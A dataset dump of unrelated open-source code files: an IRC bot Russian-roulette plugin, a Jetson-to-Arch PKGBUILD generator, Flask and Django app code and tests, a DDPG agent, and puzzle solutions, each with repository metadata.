\\\"kick me\\\" sign next to {$USER}\", \"The sign told me to!\"],\n [\"hears whispering..\", \"The voices told me to!\"],\n [\"stares at {$USER}\", \"I don't like your face.\"],\n [\"...\", \"Do I even need a reason?\"],\n [\"saps {$USER}'s sentry\", \"Sentry down!\"],\n [\"hits {$USER} in the head with a baseball\", \"Bonk!\"],\n [\"ponies {$USER}\", \"Kicking is magic!\"],\n [\"tags {$USER} as NSFW\", \"No NSFW content allowed here!\"],\n [\"gives {$USER} a bad rating on Metacritic\", \"Your game is bad and you should FEEL bad\"],\n [\"dances\", \"Do the safety dance, dammit!\"],\n [\"stares into {$USER}'s soul\", \"You have a dirty, DIRTY soul.\"],\n [\"becomes a zombie and eats {$USER}\", \"Braaaaaaaaainnnnsssss...\"],\n [\"runs over {$USER}\", \"HEY, WATCH WHERE YOU'RE GOING!\"],\n [\"{$NICK} {$NICK} {$NICK}\", \"{$NICK}\"],\n [\"{$USER} {$USER}\", \"{$USER}\"],\n [\"catches {$USER} in a pokeball\", \"Gotta catch 'em all!\"],\n [\"headshots {$USER}\", \"Thanks for standin' still, wanker!\"],\n [\"shoots {$USER}\", \"Dying is easy.. Here, let me show you.\"],\n [\"smacks {$USER} with a frying pan\", \"Demopan?\"],\n [\"terminates {$USER}\", \"Get to de choppa!\"],\n [\"applies DRM to {$USER}\", \"Error 37\"],\n [\"spleefs {$USER}\", \"AHAHHAHAHAH LAAAVAAA HAAHAHAHAA HAHAAHAHAA.. Haa.. *cough*\"],\n [\"starts talking in third person\", \"{$NICK} kicked {$USER} from {$CHANNEL} (Kickception!)\"],\n [\"makes {$USER} uncool\", \"{$CHANNEL} is too cool for you!\"],\n [\"roj4kwegrajeskrguaiyrgueargaueyirgairgayhr!\", \"AY, MACARENA!\"],\n [\"steals {$USER}'s face\", \"Your face will make a fine skirt. ~_~\"],\n [\"clubs {$USER} over the head with a rubber mallet\", \"BOOOOOOOOOING!\"]\n ]\n\n def __init__(self, irc):\n self.irc = irc\n# self.guns_handler = yaml_loader(True, \"rroulette\")\n self.stats_handler = yaml_loader(True, \"rroulette\")\n# self.guns = self.guns_handler.load(\"guns\", {\"guns\": []})[\"guns\"]\n self.stats = self.stats_handler.load(\"stats\")\n\n self.channels = {}\n self.users = {}\n\n self.help = {\n \"rroulette\": \"Bite the bullet.. or not?\\nUsage: %srroulette\" % self.irc.control_char,\n \"shoot\": \"Shoot someone.\\n\" +\n (\"Usage: %sshoot [:channel]\\n\" % self.irc.control_char) +\n \"NOTE: If opped and you are a voice or higher, this will kick the user.\",\n \"rstats\": \"Get stats about people and channels using this plugin.\\n\" +\n \"Usage: \" + self.irc.control_char + \"rstats [stat]\\n\" +\n \"Valid stats: all, shots, deaths, players (Channel only), chambers (Channel only), games (User only)\\n\" +\n \"NOTE: If no stat is included, all stats will be returned.\"\n }\n\n def newChannel(self, data):\n channel = data[\"channel\"]\n element = channel\n\n if element not in self.channels.keys():\n players = []\n curplayers = []\n shots = 0\n deaths = 0\n chambers = 6\n\n data = {\"players\": players, \"shots\": shots, \"deaths\": deaths, \"chambers\": chambers,\n \"curplayers\": curplayers}\n\n self.channels[element] = data\n\n def load(self):\n# self.guns = self.guns_handler.load(\"guns\")[\"guns\"]\n self.stats = self.stats_handler.load(\"stats\")\n\n if self.stats:\n if self.stats[\"channels\"]:\n for element in self.stats[\"channels\"].keys():\n data = self.stats[\"channels\"][element]\n self.channels[element] = data\n\n if self.stats[\"users\"]:\n for element in self.stats[\"users\"].keys():\n data = self.stats[\"users\"][element]\n self.users[element] = data\n\n for element in self.irc.channels:\n channel = element\n if channel not in self.channels.keys():\n players = []\n curplayers = []\n shots = 0\n deaths = 0\n chambers = 6\n\n data = {\"players\": players, \"shots\": shots, \"deaths\": deaths, \"chambers\": chambers,\n \"curplayers\": curplayers}\n\n self.channels[channel] = data\n\n for user in self.irc.chanlist[element].keys():\n if user not in self.users.keys():\n games = 0\n shots = 0\n deaths = 0\n\n stuff = {\"games\": games, \"shots\": shots, \"deaths\": deaths}\n self.users[user] = stuff\n\n def save(self, data=None):\n stuff = {\"channels\": self.channels, \"users\": self.users}\n self.stats_handler.save_data(\"stats\", stuff)\n\n def getstats(self, user, channel, arguments):\n if len(arguments) > 2:\n type = arguments[1]\n about = arguments[2]\n stat = \"all\"\n if len(arguments) > 3:\n stat = arguments[3]\n possible_stats = [\"all\", \"shots\", \"deaths\", \"players\", \"games\", \"chambers\"]\n possible_types = [\"user\", \"channel\"]\n if type not in possible_types:\n self.irc.sendnotice(user, \"Invalid type: %s - See %shelp rstats\" % (type, self.irc.control_char))\n elif stat not in possible_stats:\n self.irc.sendnotice(user, \"Invalid stat: %s - See %shelp rstats\" % (stat, self.irc.control_char))\n elif stat in [\"players\", \"chambers\"] and type == \"user\":\n self.irc.sendnotice(user, \"Invalid stat (%s) for type (%s) - See %shelp rstats\" % (stat, type, self.irc.control_char))\n elif stat == \"deaths\" and type == \"channel\":\n self.irc.sendnotice(user, \"Invalid stat (%s) for type (%s) - See %shelp rstats\" % (stat, type, self.irc.control_char))\n else:\n if stat == \"shots\":\n if type == \"channel\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Shots in %s: %s\" % (about, self.channels[about][\"shots\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Shots fired for %s: %s\" % (about, self.users[about][\"shots\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"deaths\":\n if type == \"channel\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Deaths in %s: %s\" % (about, self.channels[about][\"deaths\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Deaths for %s: %s\" % (about, self.users[about][\"deaths\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"players\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Total players in %s: %s\" % (about, len(self.channels[about][\"players\"])))\n if len(self.channels[about][\"curplayers\"]) > 0:\n self.irc.sendnotice(user, \"Current players in %s: (%s) %s\" % (about, len(self.channels[about][\"curplayers\"]), \", \".join(self.channels[about][\"curplayers\"])))\n else:\n self.irc.sendnotice(user, \"Nobody is currently playing in %s\" % about)\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"chambers\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Chambers remaining for %s: %s\" % (about, self.channels[about][\"chambers\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"games\":\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Games %s has played in: %s\" % (about, self.users[about][\"games\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"all\":\n if type == \"channel\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Listing all stats for %s\" % about)\n self.irc.sendnotice(user, \"Shots in %s: %s\" % (about, self.channels[about][\"shots\"]))\n self.irc.sendnotice(user, \"Deaths in %s: %s\" % (about, self.channels[about][\"deaths\"]))\n self.irc.sendnotice(user, \"Total players in %s: %s\" % (about, len(self.channels[about][\"players\"])))\n self.irc.sendnotice(user, \"Chambers remaining for %s: %s\" % (about, self.channels[about][\"chambers\"]))\n if len(self.channels[about][\"curplayers\"]) > 0:\n self.irc.sendnotice(user, \"Current players in %s: (%s) %s\" % (about, len(self.channels[about][\"curplayers\"]), \", \".join(self.channels[about][\"curplayers\"])))\n else:\n self.irc.sendnotice(user, \"Nobody is currently playing in %s\" % about)\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Listing all stats for %s\" % about)\n self.irc.sendnotice(user, \"Shots fired for %s: %s\" % (about, self.users[about][\"shots\"]))\n self.irc.sendnotice(user, \"Deaths for %s: %s\" % (about, self.users[about][\"deaths\"]))\n self.irc.sendnotice(user, \"Games %s has played in: %s\" % (about, self.users[about][\"games\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n self.irc.sendnotice(user, \"Usage: %srstats [stat]\" % self.irc.control_char)\n\n def shoot(self, user, channel, arguments):\n if len(arguments) > 1:\n target = arguments[1]\n target_user = arguments[1]\n target_channel = channel\n if \":\" in target:\n target_user = target.split(\":\", 1)[0]\n target_channel = target.split(\":\", 1)[1]\n if target_user.lower() == self.irc.nickname.lower():\n self.irc.send_raw(\"PRIVMSG \" + target_channel + \" :\" + self.irc.ctcp + \"ACTION shouts \\\"BANG!\\\" then plays dead\" + self.irc.ctcp)\n return\n curgun = random.choice(self.shoot_guns)\n mstring = \"\" + curgun[0].replace(\"{$USER}\", target).replace(\"{$NICK}\", self.irc.nickname).replace(\"{$CHANNEL}\", channel)\n kstring = curgun[1].replace(\"{$USER}\", target).replace(\"{$NICK}\", self.irc.nickname).replace(\"{$CHANNEL}\", channel)\n self.irc.send_raw(\"PRIVMSG \" + target_channel + \" :\" + self.irc.ctcp + \"ACTION \" + mstring + self.irc.ctcp)\n if (self.irc.is_op(target_channel, user) or user in self.irc.authorized.keys()) and self.irc.is_op(channel, self.irc.nickname):\n self.irc.send_raw(\"KICK %s %s :%s\" % (target_channel, target_user, kstring))\n else:\n self.irc.send_raw(\"PRIVMSG %s :%s\" % (target_channel, kstring))\n\n def play(self, user, channel, arguments):\n chambers_left = self.channels[channel][\"chambers\"]\n\n if user not in self.users.keys():\n games = 0\n shots = 0\n deaths = 0\n\n stuff = {\"games\": games, \"shots\": shots, \"deaths\": deaths}\n self.users[user] = stuff\n\n if user not in self.channels[channel][\"players\"]:\n self.channels[channel][\"players\"].append(user)\n\n if user not in self.channels[channel][\"curplayers\"]:\n self.channels[channel][\"curplayers\"].append(user)\n self.users[user][\"games\"] += 1\n\n self.users[user][\"shots\"] += 1\n self.channels[channel][\"shots\"] += 1\n random.seed()\n\n if random.randint(1, chambers_left) == 1:\n #BANG\n if self.irc.is_op(channel, self.irc.nickname):\n self.irc.send_raw(\"KICK %s %s :Bang!\" % (channel, user))\n else:\n self.irc.send_raw(\"PRIVMSG \" + channel +\" :BANG\")\n self.irc.send_raw(\"PRIVMSG \" + channel + \" :\" + self.irc.ctcp + \"ACTION reloads the gun\" + self.irc.ctcp)\n chambers_left = 6\n self.irc.send_raw(\n \"PRIVMSG \" + channel + \" :\" + 'There are %s new chambers. You have a %s%% chance of dying.' % (\n chambers_left, int(100.0 / chambers_left)))\n\n self.users[user][\"deaths\"] += 1\n self.channels[channel][\"curplayers\"] = []\n self.channels[channel][\"deaths\"] += 1\n else:\n #click\n chambers_left -= 1\n self.irc.sendmsg(channel,\n '*click* You\\'re safe for now. There are %s chambers left. You have a %s%% chance of dying.' % (\n chambers_left, int(100.0 / chambers_left)))\n self.channels[channel][\"chambers\"] = chambers_left\n self.save()\n\n name = \"Russian Roulette\"\n","repo_name":"UltrosBot/McBlockit---Helpbot","sub_path":"legacy/plugins/russianroulette.py","file_name":"russianroulette.py","file_ext":"py","file_size_in_byte":15401,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"12272014340","text":"#!/usr/bin/env python3\nimport requests\nimport re\nimport os\nimport subprocess\n\nrepo_overview = 'https://repo.download.nvidia.com/jetson/'\n\nr = requests.get(repo_overview)\nsrc = str(r.content)\ni_until = src.find('')\nsrc = src[:i_until]\ndebs = re.findall(r'https:\\/\\/repo\\S+?deb', src)\n\npkg_list = []\nprev_name = ''\nfor deb_url in debs:\n tag = None\n if 'jetson/t210' in deb_url:\n tag = 't210'\n if 'jetson/common' in deb_url:\n tag = 'common'\n if not tag:\n continue\n\n last = deb_url.rfind('/')\n deb_name = deb_url[last+1:]\n name, ver, arch = deb_name.split('_')\n arch = arch[:-4]\n if arch == 'arm64':\n arch = 'aarch64'\n t = (name, ver, arch, tag, deb_url)\n if name == prev_name:\n pkg_list.pop()\n prev_name = name\n pkg_list.append(t)\n\nprint(pkg_list)\n\nname_set = set()\nfor t in pkg_list:\n name_set.add(t[0])\n\ncwd = os.getcwd()\nfor name, ver, arch, tag, deb_url in pkg_list:\n last = deb_url.rfind('/')\n deb_name = deb_url[last+1:]\n\n os.chdir(cwd)\n os.system(f'mkdir -p {name}')\n os.chdir(cwd + '/' + name)\n\n if not os.path.isfile('control'):\n os.system(f'wget -nc {deb_url}')\n os.system(f'bsdtar -xf {deb_name}')\n os.system(f'tar xvf control.tar*')\n\n pkgdesc = ''\n depends = ''\n with open('control') as f:\n fls = f.read().splitlines()\n for fl in fls:\n if fl.startswith('Description: '):\n pkgdesc = fl[13:]\n elif fl.startswith('Depends:'):\n colon_i = fl.find(':')\n deps = fl[colon_i+1:].strip()\n deps = deps.split(',')\n for dep in deps:\n dep = dep.strip()\n i_space = dep.find(' ')\n dep_name = dep[:i_space]\n if dep_name in name_set:\n dep_ver = dep[i_space:]\n dep_ver = dep_ver.replace(' ', '').replace('(', '').replace(')','').replace('-', '_')\n depends += f\"'{dep_name}{dep_ver}' \"\n\n checksum = subprocess.check_output(f'sha256sum -b {deb_name}', cwd=os.getcwd(), shell=True, text=True)\n checksum = checksum.split()[0]\n\n ver_ = ver.replace('-', '_')\n head = f\"\"\"pkgname={name}\npkgver={ver_}\npkgrel=1\npkgdesc='{pkgdesc}'\narch=({arch})\nurl='https://repo.download.nvidia.com/jetson/'\nlicense=('custom')\ndepends=({depends})\nsource=('{deb_url}')\nsha256sums=('{checksum}')\n\"\"\"\n \n tail = \"\"\"\nprepare() {\n mkdir -p root\n tar xvf data.tar* -C root\n}\n\npackage() {\n cp -a root/. $pkgdir/\n\n # On Arch, /lib is symlink to /usr/lib\n if test -d $pkgdir/lib; then\n cp -a $pkgdir/lib/. $pkgdir/usr/lib/\n rm -rf $pkgdir/lib\n fi\n\n # On Arch, sbin is a symlink to bin\n if test -d $pkgdir/usr/sbin; then\n cp -a $pkgdir/usr/sbin/. $pkgdir/usr/bin/\n rm -rf $pkgdir/usr/sbin\n fi\n\n # Arch on ARM doesn't use multilib\n if test -d $pkgdir/lib/aarch64-linux-gnu; then\n cp -a $pkgdir/lib/aarch64-linux-gnu/. $pkgdir/lib/\n rm -rf $pkgdir/lib/aarch64-linux-gnu\n fi\n if test -d $pkgdir/usr/lib/aarch64-linux-gnu; then\n cp -a $pkgdir/usr/lib/aarch64-linux-gnu/. $pkgdir/usr/lib/\n rm -rf $pkgdir/usr/lib/aarch64-linux-gnu\n fi\n}\n\"\"\"\n if not os.path.isfile('TAIL'):\n with open('TAIL', 'w') as f:\n f.write(tail)\n else:\n with open('TAIL') as f:\n tail = f.read()\n\n print(head)\n with open('PKGBUILD', 'w') as f:\n f.write(head)\n f.write(tail)\n","repo_name":"cyj0912/alarm-aur","sub_path":"l4t_updater.py","file_name":"l4t_updater.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70809594614","text":"#!/usr/bin/python3\n\"\"\"Place-Amenity view module\"\"\"\n\nfrom flask import jsonify, abort, request\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.amenity import Amenity\nfrom models.place import Place\n\n\n@app_views.route('/places//amenities', methods=['GET'], strict_slashes=False)\ndef get_place_amenities(place_id):\n \"\"\"Retrieves the list of all Amenity objects of a Place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n amenities = [amenity.to_dict() for amenity in place.amenities]\n return jsonify(amenities)\n\n\n\n@app_views.route('/places//amenities/', methods=['DELETE'], strict_slashes=False)\ndef delete_place_amenity(place_id, amenity_id):\n \"\"\"Deletes a Amenity object from a Place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n amenity = storage.get(Amenity, amenity_id)\n if not amenity:\n abort(404)\n if amenity not in place.amenities:\n abort(404)\n place.amenities.remove(amenity)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/places//amenities/', methods=['POST'], strict_slashes=False)\ndef link_place_amenity(place_id, amenity_id):\n \"\"\"Links a Amenity object to a Place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n amenity = storage.get(Amenity, amenity_id)\n if not amenity:\n abort(404)\n if amenity in place.amenities:\n return jsonify(amenity.to_dict()), 200\n place.amenities.append(amenity)\n storage.save()\n return jsonify(amenity.to_dict()), 201\n\n","repo_name":"IntrovertedTechie/AirBnB_clone_v3","sub_path":"api/v1/views/places_amenities.py","file_name":"places_amenities.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17357790208","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport shutil\n\nimport gnupg\nfrom apps.split_logs.models import CourseDump\nfrom apps.split_logs.models import CourseDumpTable\nfrom apps.split_logs.models import Organisation\nfrom apps.split_logs.sms_command import SMSCommand\nfrom apps.split_logs.utils import s3_upload_file\nfrom django.conf import settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(SMSCommand):\n help = \"Course DB encrypt files\"\n\n def handle(self, *args, **options):\n self.setOptions(**options)\n\n gpg = gnupg.GPG()\n gpg.encoding = \"utf-8\"\n organisations = Organisation.objects.filter(\n active=True,\n public_key__isnull=False,\n )\n tables = CourseDumpTable.objects.all()\n for org in organisations:\n logger.info(f\"Process organisation <{org}>\")\n cd = CourseDump.objects.filter(\n course__organisation=org,\n is_encypted=True,\n date=self.now\n )\n if len(cd) == 0:\n logger.warning(\"No course dumps\")\n else:\n courses = org.course_set.filter(active=True)\n if len(cd) == len(courses) * len(tables):\n folder_name = cd[0].dump_folder_name()\n if os.path.isdir(folder_name):\n zip_name = shutil.make_archive(\n folder_name,\n \"zip\",\n os.path.dirname(folder_name),\n os.path.basename(folder_name)\n )\n else:\n zip_name = \"{}.zip\".format(folder_name)\n\n if os.path.exists(zip_name):\n bucker_filename = f\"{org.name}/dump-db/{os.path.basename(zip_name)}\"\n logger.info(f\"Upload file <{zip_name}> to <{bucker_filename}>\")\n s3_upload_file(\n org.bucket_name,\n org,\n zip_name,\n bucker_filename,\n )\n\n if os.path.isdir(folder_name):\n # remove original folder\n shutil.rmtree(folder_name)\n else:\n logger.warning(\n f\"Not all tables were dumped/encrypted, please check: organisation <{org.name}>, date=<{self.now}>\"\n )\n","repo_name":"epfl-cede/swissmooc-extras","sub_path":"src/backend/apps/split_logs/management/commands/course_db_upload.py","file_name":"course_db_upload.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16026633124","text":"# 한 줄로 서기, 실버2, 구현 ,그리디\nfrom sys import stdin\nn = int(stdin.readline())\na = list(map(int,stdin.readline().split()))\nans = [0 for i in range(n)]\nfor i in range(1, n+1):\n tmp = a[i-1]\n cnt = 0\n for j in range(n):\n if cnt == tmp and ans[j] == 0: # 내가 현재 남은 사람 중, 제일 작은 사람\n ans[j] = i\n break\n elif ans[j] == 0:\n cnt += 1\n\nprint(*ans)","repo_name":"lookinmin/CodingTest","sub_path":"Greedy/BOJ_1138.py","file_name":"BOJ_1138.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"204270923","text":"import torch\nfrom model.conv4d import Conv4d\nimport itertools\nimport model.conv4d\n\n\ndef test_conv4d():\n kernel_size = (1, 1, 1, 1)\n padding = (0, 0, 0, 0)\n stride = (1, 1, 1, 1)\n dilation = (1, 1, 1, 1)\n shape = (Batch, _, l_i, d_i, h_i, w_i) = (10, 5, 8, 12, 40, 80)\n (l_k, d_k, h_k, w_k) = kernel_size\n (l_p, d_p, h_p, w_p) = padding\n (l_d, d_d, h_d, w_d) = dilation\n (l_s, d_s, h_s, w_s) = stride\n l_o = (l_i + 2 * l_p - (l_k) - (l_k - 1) * (l_d - 1)) // l_s + 1\n d_o = (d_i + 2 * d_p - (d_k) - (d_k - 1) * (d_d - 1)) // d_s + 1\n h_o = (h_i + 2 * h_p - (h_k) - (h_k - 1) * (h_d - 1)) // h_s + 1\n w_o = (w_i + 2 * w_p - (w_k) - (w_k - 1) * (w_d - 1)) // w_s + 1\n expect = l_o, d_o, h_o, w_o\n assert expect == tuple(\n itertools.starmap(\n model.conv4d._get_dimension_size,\n zip(shape[2:], kernel_size, padding, dilation, stride),\n )\n )\n","repo_name":"leaver2000/mesoformer","sub_path":"tests/conv4d_test.py","file_name":"conv4d_test.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42698633925","text":"# Advent of Code 2022\n# Day 20\n\nPART_1 = False\nDEBUG = False\nif DEBUG:\n FILE_NAME = 'day20-test.txt'\nelse:\n FILE_NAME = 'day20-input.txt'\n\nif PART_1:\n NUMBER_OF_CYCLES = 1\nelse:\n KEY = 811589153\n NUMBER_OF_CYCLES = 10\n\ndef readFile(name):\n file = open(name, mode = 'r', encoding = 'utf-8-sig')\n lines = file.readlines()\n file.close()\n return lines\n\ndef move(data, src, count):\n element = data.pop(src)\n dst = src + count\n data.insert(dst % len(data), element)\n\n# Read the file.\nlines = readFile(FILE_NAME)\n\noriginal = []\nfor line in lines:\n original.append(int(line))\nsize = len(original)\n\nif DEBUG:\n print(\"Original:\", original, \"size=\", size)\n\nif not PART_1:\n original = [o * KEY for o in original]\n if DEBUG:\n print(\"Keyed:\", original)\n\ndecrypted = []\nfor i in range(0, size):\n decrypted.append({ \"value\" : original[i], \"position\" : i })\n\nfor c in range(0, NUMBER_OF_CYCLES):\n for i in range(0, size):\n for k in range(0, size):\n if decrypted[k][\"position\"] == i:\n v = decrypted[k][\"value\"] \n if v != 0: # if 0, don't move\n move(decrypted, k, v)\n if DEBUG:\n print(\"Move:\", v, \":\", [d[\"value\"] for d in decrypted])\n break\n\nresult = [d[\"value\"] for d in decrypted]\n\nat = result.index(0)\nx = result[(at + 1000) % size]\ny = result[(at + 2000) % size]\nz = result[(at + 3000) % size]\n\nif DEBUG:\n print(\"Result: \", result)\n\nprint(\"Coordinates: 0 at [\", at, \"],\", x, \"at [\", (at + 1000) % size, \"],\", y, \"at [\", (at + 2000) % size, \"],\", z, \"at [\", (at + 3000) % size, \"]\")\nsum = x + y + z\nprint(\"sum =\", sum)\n","repo_name":"jambolo/advent_of_code_2022","sub_path":"day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23506194089","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nnumbers = list(map(int, input().split()))\nmath = list(map(int, input().split()))\n\nmaxi = -1000000000\nmini = 1000000000\n\ndef cal(num, i, add, minus, mul, div):\n global maxi, mini, numbers\n if i == n:\n maxi = max(maxi, num)\n mini = min(mini, num)\n return\n else:\n if add:\n cal(num + numbers[i], i+1, add-1, minus, mul, div)\n if minus:\n cal(num - numbers[i], i+1, add, minus-1, mul, div)\n if mul:\n cal(num * numbers[i], i+1, add, minus, mul-1, div)\n if div:\n cal(int(num / numbers[i]), i+1, add, minus, mul, div-1)\n\ncal(numbers[0], 1, math[0], math[1], math[2], math[3])\nprint(maxi)\nprint(mini)\n\n","repo_name":"nkrang/Algorithm-Study","sub_path":"202109/B-14888/연산자_끼워넣기.py","file_name":"연산자_끼워넣기.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73790786611","text":"\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\n\nfrom RL_model import (Actor, Critic)\nfrom memory import SequentialMemory\nfrom random_process import OrnsteinUhlenbeckProcess\nfrom util import *\n\n\ncriterion = nn.MSELoss()\n\nclass DDPG(object):\n def __init__(self, nb_states, nb_actions, args):\n \n if args.seed > 0:\n self.seed(args.seed)\n\n self.nb_states = nb_states\n self.nb_actions= nb_actions\n \n # Create Actor and Critic Network\n self.hidden = args.hidden\n self.actor = Actor(self.nb_states//args.batch_size, self.nb_actions, args.hidden)\n self.actor_target = Actor(self.nb_states//args.batch_size, self.nb_actions, args.hidden)\n self.actor_optim = Adam(self.actor.parameters(), lr=1e-5)\n\n self.critic = Critic(self.nb_states, self.nb_actions, args.hidden)\n self.critic_target = Critic(self.nb_states, self.nb_actions, args.hidden)\n self.critic_optim = Adam(self.critic.parameters(), lr=1e-5)\n\n hard_update(self.actor_target, self.actor) # Make sure target is with the same weight\n hard_update(self.critic_target, self.critic)\n \n # Create replay buffer\n self.memory = SequentialMemory(limit=args.rmsize, window_length=args.window_length)\n self.random_process = OrnsteinUhlenbeckProcess(size=nb_actions, theta=args.ou_theta, mu=args.ou_mu, sigma=args.ou_sigma)\n\n # Hyper-parameters\n self.batch_size = args.batch_size\n self.tau = args.tau\n self.discount = args.discount\n self.depsilon = 1.0 / args.epsilon\n self.max_lr = 1e-1\n self.min_lr = 1e-6\n\n # \n self.epsilon = 1.0\n self.s_t = None # Most recent state\n self.a_t = None # Most recent action\n self.is_training = True\n\n # \n if USE_CUDA: self.cuda()\n\n def update_policy(self):\n # Sample batch\n state_batch, action_batch, reward_batch, next_state_batch, terminal_batch = self.memory.sample_and_split(self.batch_size)\n\n # Prepare for the target q batch\n\n s_t = to_tensor(next_state_batch, volatile=True).unsqueeze(-1)\n h0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n c0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n next_q_values = self.critic_target([\n to_tensor(next_state_batch, volatile=True),\n self.actor_target(s_t, (h0, c0)),\n ])\n \n target_q_batch = to_tensor(reward_batch) + self.discount*to_tensor(terminal_batch.astype(np.float))*next_q_values\n\n # Critic update\n self.critic.zero_grad()\n\n q_batch = self.critic([to_tensor(state_batch), to_tensor(action_batch)])\n \n value_loss = criterion(q_batch, target_q_batch)\n value_loss.backward()\n self.critic_optim.step()\n\n # Actor update\n self.actor.zero_grad()\n\n s_t = to_tensor(state_batch, volatile=True).unsqueeze(-1)\n h0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n c0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n policy_loss = -self.critic([\n to_tensor(state_batch),\n self.actor(s_t, (h0, c0))\n ])\n\n policy_loss = policy_loss.mean()\n policy_loss.backward()\n self.actor_optim.step()\n\n # Target update\n soft_update(self.actor_target, self.actor, self.tau)\n soft_update(self.critic_target, self.critic, self.tau)\n\n\n def cuda(self):\n self.actor.cuda()\n self.actor_target.cuda()\n self.critic.cuda()\n self.critic_target.cuda()\n\n def observe(self, r_t, s_t1, done):\n if self.is_training:\n self.memory.append(self.s_t, self.a_t, r_t, done)\n self.s_t = s_t1\n\n def random_action(self):\n action = np.random.uniform(self.min_lr, self.max_lr, self.nb_actions)\n self.a_t = action\n return action\n\n def select_action(self, s_t, decay_epsilon=True):\n s_t = to_tensor(np.array(s_t)).unsqueeze(0).unsqueeze(-1)\n h0 = Variable(torch.randn(2, 1, self.hidden)).cuda()\n c0 = Variable(torch.randn(2, 1, self.hidden)).cuda()\n action = to_numpy(self.actor(s_t, (h0, c0)))\n action += self.is_training*max(self.epsilon, 0)*self.random_process.sample()\n action = np.clip(action, self.min_lr, self.max_lr)\n if decay_epsilon:\n self.epsilon -= self.depsilon\n \n self.a_t = action\n return action\n\n def reset(self, obs):\n self.s_t = obs\n self.random_process.reset_states()\n ","repo_name":"RingBDStack/ICL-Incremental-InfoNCE","sub_path":"ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"6456159105","text":"from django.test import TestCase\r\nfrom django.contrib.auth.models import User\r\nfrom .models import Thread, Message\r\n\r\n\r\nclass ThreadTestCase(TestCase):\r\n def setUp(self):\r\n self.user1 = User.objects.create_user('juan',None,'123456')\r\n self.user2 = User.objects.create_user('jose',None,'123456')\r\n self.user3 = User.objects.create_user('carlos',None,'123456')\r\n self.thread = Thread.objects.create()\r\n def test_add_users_to_thread(self):\r\n self.thread.users.add(self.user1,self.user2)\r\n self.assertEqual(len(self.thread.users.all()), 2)\r\n def test_filter_thread_by_users(self):\r\n self.thread.users.add(self.user1,self.user2)\r\n threads = Thread.objects.filter(users=self.user1).filter(users=self.user2)\r\n self.assertEqual(self.thread, threads[0])\r\n def test_add_messages_to_thread(self):\r\n self.thread.users.add(self.user1, self.user2)\r\n message1 = Message.objects.create(user=self.user1, content=\"Hola\")\r\n message2 = Message.objects.create(user=self.user2, content=\"Hola\")\r\n self.thread.messages.add(message1, message2)\r\n self.assertEqual(len(self.thread.messages.all()),2)\r\n for message in self.thread.messages.all():\r\n print(\"({}): {}\".format(message.user, message.content))\r\n def test_add_message_from_user_not_in_thread(self):\r\n self.thread.users.add(self.user1, self.user2)\r\n message1 = Message.objects.create(user=self.user1, content=\"Hola\")\r\n message2 = Message.objects.create(user=self.user2, content=\"Hola\")\r\n message3 = Message.objects.create(user=self.user3, content=\"Tercer usuario\")\r\n self.thread.messages.add(message1,message2,message3)\r\n self.assertEqual(len(self.thread.messages.all()),2)\r\n # def test_find_thread_with_custom_manager(self):\r\n # self.thread.users.add(self.user1, self.user2)\r\n # thread = Thread.objects.find(self.user1,self.user2)\r\n # self.assertEqual(self.thread, 